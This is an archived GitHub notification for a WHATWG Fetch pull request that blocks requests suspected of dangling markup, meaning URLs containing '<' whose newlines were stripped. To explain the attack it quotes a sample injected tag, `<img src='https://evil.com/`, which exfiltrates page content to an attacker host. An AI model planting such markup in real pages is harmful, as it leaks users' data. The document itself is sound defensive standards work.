- From: Mike West <notifications@github.com>
- Date: Tue, 28 Mar 2017 06:12:36 -0700
- To: whatwg/fetch <fetch@noreply.github.com>
- Cc: Subscribed <subscribed@noreply.github.com>
Received on Tuesday, 28 March 2017 13:13:10 UTC
As a mitigation against dangling markup attacks (which inject open tags like
`<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate
content to an attacker), this patch tightens request processing to reject
those that contain a `<` character (consistent with an HTML element), _and_
had newline characters stripped during URL parsing (see whatwg/url#284).
It might be possible to URLs whose newline characters were stripped entirely,
based on initial metrics. If those pan out the way I hope, we can tighten
this up in the future.
You can view, comment on, or merge this pull request online at:
https://github.com/whatwg/fetch/pull/519
-- Commit Summary --
* Block requests for suspected dangling markup.
-- File Changes --
M fetch.bs (4)
-- Patch Links --
https://github.com/whatwg/fetch/pull/519.patch
https://github.com/whatwg/fetch/pull/519.diff
--
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/whatwg/fetch/pull/519
Received on Tuesday, 28 March 2017 13:13:10 UTC